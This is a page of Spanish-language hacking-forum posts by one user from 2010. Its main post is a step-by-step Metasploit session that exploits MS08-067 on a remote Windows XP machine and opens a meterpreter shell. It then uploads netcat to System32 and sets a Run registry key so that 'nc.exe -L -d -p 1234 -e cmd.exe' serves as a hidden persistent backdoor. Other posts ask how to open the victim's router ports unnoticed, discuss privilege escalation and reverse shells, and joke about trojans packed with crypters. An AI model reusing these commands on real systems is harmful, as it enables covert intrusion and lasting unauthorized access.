Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Debci

#721
Cita de: kamsky en 31 Julio 2010, 13:18 PM
http://www.exploit-db.com/exploits/14403/
Mi victima tendria que clicar el aceso directo? Y que conseguiré con eso? Shell de system?

Saludos
#722
Cita de: kamsky en 31 Julio 2010, 13:03 PM
http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=windows&filter_author=&filter_platform=45&filter_type=0&filter_port=&filter_osvdb=&filter_cve=
O soy muy inutil o no veo ninguno de escala de privilegios xD
El de lnk code execution lo he leido pero no hay exploit, y no es intencion opcodearlo sobre la marcha...

Saludos
#723
Cita de: kamsky en 31 Julio 2010, 12:52 PM
si, suele haber acceso por telnet a los routers, una vez que te logues tendrás un menú parecido al que te sale por Web, en mi caso este:

  Main Menu

1.  ADSL Link State
2.  LAN
3.  WAN
4.  DNS Server
5.  Route Setup
6.  NAT
7.  Firewall
8.  Quality Of Service
9.  Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
->

Entiendo...
EDITO:
Le hago una conexion a la puerta de enlace del router?
Ahora he buscado exploits para escalar privilegios, he leido sobre el ms10_15 pero no hay nada especifico sobre el, solamente lo que hace...
He visto metodos, pero tendria que tener aceso fisico al pc para escalarlos, otra posibilidad es crackear la pass de admin pero si me deslogueo por consola pierdo conexion con el meterpreter.

He pensado que en una situacion real se podria hacer con ingenieria social, pero descarto dicha posiblidad.

Saludos
#724
Cita de: kamsky en 31 Julio 2010, 12:46 PM
tienes acceso al router desde el PC??

busca bugs en windows recientes que te permitan escalar privilegios, últimamente hay bastantes ;)
Bien me pongo a ello, aceso al router? Mmm desde consola?

Saludos
#725
Cita de: kamsky en 31 Julio 2010, 12:36 PM
si tienes acceso al PC, salta desde este a la conf del router y abre los puertos, no deberías de tener muchos problemas, otra opción es una reverse shell, que sea la víctima la que se conecte a tí
asi lo he intentado pero ahora mi supuesta victima no tengo permisos de administracion :S
Ni puedo escribir registro ni nada (lo del reverse ya he visto que puedo, es efectivo)
Y con lo que se no puedo escalar privilegios remotamente...

Alguna idea?

Saludos
#726
Cita de: Lord R.N.A. en 31 Julio 2010, 04:39 AM
Cita de: egyware en 31 Julio 2010, 04:02 AM
Cita de: Lord R.N.A. en 31 Julio 2010, 01:36 AM
Cita de: egyware en 30 Julio 2010, 04:03 AM
Cita de: Zzombi en 30 Julio 2010, 03:12 AM
y si la victima no tiene la JVM  :xD
Precisamente, tu no eliges una victima al azar la victima tiene Java :D

El malware no puede tener dependencias, unica dependencia aceptable aun es el sistema operativo.
Tu lo has dicho, el sistema operativo de java es el Runtime(JRE) ;)
Lo bueno de un troyano en Java no dependes del OS, solo del Runtime :/

depende de si tiene o no Java Instalado... en mi caso no utilizo Java, por lo tanto soy inmune... eso es malo para el malware.
Y quien quiere lammearte a ti? xD es coña no te lo tomes a mal xD

Entonces llega un lammer mas lammer todavia, coje bifrost un crypter o lo bindea a un ejecutable y te lo cuela, toma lord R.N.A. es el instalador de java xD
(Es todo broma, no te enfades =D)
Saludos
#727
Java / Re: Compilar para windows
31 Julio 2010, 11:26 AM
Cita de: nico56 en 30 Julio 2010, 19:07 PM
Que es codear para el netbeans? Yo uso el eclipse. Se puede o no compilar como si fuera un programa ejecutable ?
No te has enterado en las 7 u 8 respuestas que te han dado?
xDDDD

Saludos
#728
Las matematicas no fallan! Suicidemonos todos para demostrarles nuestra fidelidad!


Saludos
#729
Hola a todos, recientemente practicando PenTest con un equipo remoto (es mio si...) consegui explotarle una vulnerabilidad y bindearme a una reverse tcp meterpreter, una vez en su equipo, me dispuse a asegurarme el aceso, lo hice de la siguiente manera (basandome en lo que Kamsky explicó):

               ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7808 updated 7 days ago (2009.12.10)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST xx.xx.xx.xx
RHOST => xx.xx.xx.xx
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.0.3      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     xx.xx.xx.xx      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish[*] Selected Target: Windows XP SP2 Spanish (NX)[*] Triggering the vulnerability...[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (xx.xx.xx.xx:1934 -> xx.xx.xx.xx:4444)

meterpreter >


Una vez dentro me dispuse a subir el netcat.exe y ponerlo con la shell en un puerto y escribirlo en el registro:

meterpreter > upload /root/tools/nc.exe C:\\Windows\\System32\\
[*] uploading  : /root/tools/nc.exe -> C:\Windows\System32\
[*] uploaded   :  /root/tools/nc.exe-> C:\Windows\System32\\nc.exe
meterpreter >


Una vez subido y que se puede ejecutar en la consola sin ruta especifica:

meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v WindowsCore -d 'C:\Windows\System32\nc.exe -L -d -p 1234 -e cmd.exe'
Successful set Hacked.
meterpreter >


Lo pondrá a la espera en el puerto 1234, pero si ese puerto no esta mapeado en el router como diablos voy a conectarme a la backdoor?Puedo de alguna manera abrir puertos en su router? Estuve pensando en subirle un servidor VNC pero es muy cutre, y se daria cuenta de que estan trasteando(en el caso de que fuese una situación real...).

A expensas de que muchos van a decir que como es tu router abrelos tu, les diré que en una situación real no se puede hacer eso, y quiero hacerlo todo como si una real se tratase!

Saludos y gracias a todos!